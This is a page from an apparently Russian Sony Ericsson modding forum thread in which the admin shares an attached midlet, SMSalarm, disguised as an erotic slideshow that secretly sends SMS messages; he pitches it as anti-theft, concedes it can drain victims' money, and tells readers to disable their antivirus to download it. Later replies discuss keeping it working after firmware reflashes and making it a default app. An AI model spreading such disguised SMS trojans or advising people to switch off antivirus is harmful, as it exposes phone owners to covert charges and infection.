Все для Sony Ericsson, патчи, эльфы, моддинг, прошивка
  
Логин: Пароль: Запомнить: Привет гость! Зарегистрируйся или авторизируйся для получения доп. возможностей!
Разделы
PDA версия сайта
TrackIDentify
Новости
Статьи
Файлы
Патчи
Патчи A2
Патчи db2020
Эльфы
Исходники эльфов
Wiki
Форум
Опросы
Обратная связь
Развернуть/Свернуть
 
Развернуть/Свернуть

SMSalarm в работе : Мультимедиа : Форум : Для Sony Ericsson патчи эльфы моддинг прошивка
/  Список форумов
   /  Мультимедиа
/  SMSalarm в работе
На печать 
Правила 
Страница 4 из 8: « 1 2 3 [4] 5 6 7 8 »

Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #31 [12.07.06, 12:54] SMSalarm в работе   

 
Как известно для большинства телефонов других моделей есть возможнось отсылать скрытно SMS сообщения.
До недавнего времени в SE такого нельзя было сделать, т.к. инженеры компании подошли более серьезно к правам приложения.

С выходом патчей игнорирования "Полномочия" для явы, такая возможность появилась.

Ниже прикрепил измененый мною мидлет SMSalarm, который закомуфлирован под эротическое слайд-шоу.

После запуска мидлета, пока вы смотрите картинки, идет отправление на определеный номер СМС`ки с нужным текстом.

Установка приложения через JAD, но перед этим надо в JAD файле прописать свой номер (заместо 911, писать через 8 а не +7) и нужный текст (желательно латинсикй).

Зачем все это нужно?

1. Если у вас украдут телефон и у вас стоит патч и мидлет, то есть шанс что грабитель позарится на заманчивое название и запустит это слайд-шоу, тем самым вам станет известен номер грабителя (если он вставит свою симку).

2. Для отсылки скрытных сообщений.
К сожалению плохие люди могут воспользоваться этим, чтобы выкачать с вас деньги, например в обменник разместят, а вы скачаете и запустите.......

Предупрежден, значит вооружен (с)

ВНИМАНИЕ!!! Ваш антивирусник (Каспер, Веб, НОД и т.д.) будет ругаться и говорить что там троян. Это связано с анализом антивирусника на вредноносное ПО. В принципе, т.к. программа отсылает СМС, это и является вредноносным ПО. Это не позволит Вам скачать. Для скачки отключите антивирус потом качайте. Вы можете неповерить и подумать что Вам трояна впаривают, это Ваши проблемы. Больше не просим выслать на мыло или на другой файлообменник кинуть. Антивирус и от туда не даст Вам скачать.



Прикрепленный к сообщению файл:

smsalarm.zip smsalarm.zip (193.57 kb; 2306 hits) Скачать файл


TOOKY T83 (1.3.1-L2), MK808B

-=Alex=-


Новичок


Регистрация: 4.8.06
Сообщений: 19
Репутация: 0
Откуда: Ижевск




 
  #32 [06.09.06, 18:58] Re: SMSalarm в работе   

 
YAR
SEuser а нафих его потписывать, не подскажешь? Эта прога пашет при отключении полномочий явы так что смысл её подписывать, если она смс не отошлёт.......

Если прошить СЕУСом (только майн), патч то на яву слетит, а вот тут то нам и проигодится сертификат халмера мидлет все равно будет слать смс. Я его еще сделаю дефолтной прогой.
Убить можно через фар или прошивкой ФС. Все



Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #33 [07.09.06, 00:17] Re: SMSalarm в работе   

 
Я уж думал что с появлением плагина все сразу забыли про SEUS, ан нет, все еще им пытаются что-то сделать...




TOOKY T83 (1.3.1-L2), MK808B

-=Alex=-


Новичок


Регистрация: 4.8.06
Сообщений: 19
Репутация: 0
Откуда: Ижевск




 
  #34 [07.09.06, 10:31] Re: SMSalarm в работе   

 
И все же есть у кого нибудь?



anonymous














  #35 [24.10.06, 10:55] Re: SMSalarm в работе   

 
Доброго дня всем!Начало для зашиты наши положено,но есть один минус.Эта прога работает только если её запустить и сверять сим карту она тоже не умеет.Насколько я понимаю прога сюда пришла с motofana там давно ей пользуются.У меня до W800 был V3 там тоже эта прога стояла,благо не понадоблась.Также там разработали ещё одну прогу,я тоже ей пользовался,называется Clock.Смысл в том что она является резедентной и может сама запускатся как скринсевер,плюс она может сверять симки и если imsi симки не совпал то она отсылат сообщение на заданный номер.На разоре я ей пользовался во всю,а на W800 не пошла ошибка приложения.У меня огромная прозьба к тем кто пишет яву переделать эту прогу для наших мобил.Я могу куданить выложить её но можите взять сдесьGrafMoto надеюсь автор програмы не будет возрожать!!!


А сегодня как раз в файле Customize увидел вот такую строку <enable-imsi-lock>false</enable-imsi-lock>,это видимо блокировка симкарты на оператора.Нужно чтоб не блокировала,а сверяла и отсылала смс.Clock как раз делает проверку imsi симкарты в теле.Ещё одна строка сразу за imsi lock <convert-fwlock-to-dcf>false</convert-fwlock-to-dcf> изменяет какой то лок.
Ну что на это скажите.

[ Редактировано Ankor в 25.10.06 12:45 ]



Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #36 [25.10.06, 16:26] Re: SMSalarm в работе   

 
Ankor
А сегодня как раз в файле Customize увидел вот такую строку <enable-imsi-lock>false</enable-imsi-lock>,это видимо блокировка симкарты на оператора.Нужно чтоб не блокировала,а сверяла и отсылала смс.Clock как раз делает проверку imsi симкарты в теле.Ещё одна строка сразу за imsi lock <convert-fwlock-to-dcf>false</convert-fwlock-to-dcf> изменяет какой то лок.
Ну что на это скажите.

А что ты хочешь услышать?
Надо знающему яву, смотреть используемые классы в том приложении.




TOOKY T83 (1.3.1-L2), MK808B

anonymous














  #37 [31.10.06, 09:56] Re: SMSalarm в работе   

 
Я писал чтобы люди подумали интересно им это или нет.Ну и конечно адресовал это яваписателям.Ведь SMSalarm переделали под SE.Если за это возьмутся знающие люди это будет очень востребованно вплане защиты мобил! :-)



anonymous














  #38 [21.11.06, 22:27] Re: SMSalarm в работе   

 
И нифига не скачивается, ссылка битая :-(



Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #39 [22.11.06, 08:06] Re: SMSalarm в работе   

 
Gram
Проверил, все качает и не бито.




TOOKY T83 (1.3.1-L2), MK808B

SiNgle


Developer


Регистрация: 3.7.06
Сообщений: 24
Репутация: 8





 
  #40 [22.11.06, 10:46] Re: SMSalarm в работе   

 
надо патч делать, а не яву мучать. делать то там нефиг





Zormax


Admin


Регистрация: 12.12.05
Сообщений: 5826
Репутация: 5274
Откуда: Nizhniy Novgorod




 
  #41 [22.11.06, 10:59] Re: SMSalarm в работе   

 
SiNgle
У нас опыта в создании такого рода патчей НЭМА ;-)




TOOKY T83 (1.3.1-L2), MK808B
Страница 4 из 8: « 1 2 3 [4] 5 6 7 8 »


Похожие темы
 ТемаОтветыАвторПросмотрыОбновление
  Проблемы при работе с Far-ом7zero_2808795410.05.09, 12:31
  Виснет при работе радио4alb884577411.01.09, 18:12
  вопросы по работе с k7902anonymous411224.01.07, 08:37

  • Поиск
  • Права
Вы не можете начинать темы.
Вы не можете редактировать свои сообщения.
Вы не можете создавать опросы.
Вы не можете вкладывать файлы в сообщения.
Вы не можете отвечать на сообщения.
Вы не можете удалять свои сообщения.
Вы не можете голосовать.

Главная Новости Статьи Файлы Патчи Форум Опросы PDA
- Генерация страницы: 0.18 секунд | 12 Запросов | HTML: 43.39 КБ -